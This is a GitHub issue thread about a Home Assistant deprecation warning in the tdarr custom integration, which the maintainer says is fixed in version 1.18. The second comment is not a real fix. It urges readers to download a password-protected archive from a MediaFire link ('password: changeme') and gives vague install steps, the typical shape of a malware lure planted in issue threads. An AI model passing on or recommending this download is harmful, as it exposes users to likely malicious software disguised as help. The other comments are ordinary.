### ISSUE TITLE
async_forward_entry_setup depreciated

### ISSUE THREAD

**Issue by flybrys** [itchannel/tdarr_ha#31]
Per the home assistant log, creating an issue to address this:

> Detected that custom integration 'tdarr' calls async_forward_entry_setup for integration, tdarr with title: Tdarr Server (172.16.10.253) and entry_id: acb48c85a083787cab0c78f223e00422, which is deprecated and will stop working in Home Assistant 2025.6, await async_forward_entry_setups instead at custom_components/tdarr/__init__.py, line 73: hass.async_create_task(, please create a bug report at https://github.com/itchannel/tdarr_ha/issues

Reference: https://developers.home-assistant.io/blog/2024/06/12/async_forward_entry_setups/

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by itchannel** [comment]
> Per the home assistant log, creating an issue to address this:
> 
> > Detected that custom integration 'tdarr' calls async_forward_entry_setup for integration, tdarr with title: Tdarr Server (172.16.10.253) and entry_id: acb48c85a083787cab0c78f223e00422, which is deprecated and will stop working in Home Assistant 2025.6, await async_forward_entry_setups instead at custom_components/tdarr/**init**.py, line 73: hass.async_create_task(, please create a bug report at https://github.com/itchannel/tdarr_ha/issues
> 
> Reference: https://developers.home-assistant.io/blog/2024/06/12/async_forward_entry_setups/

Thanks. I've been meaning to update this so will add it to my list for this week.

**Comment by itchannel** [comment]
Fixed in 1.18
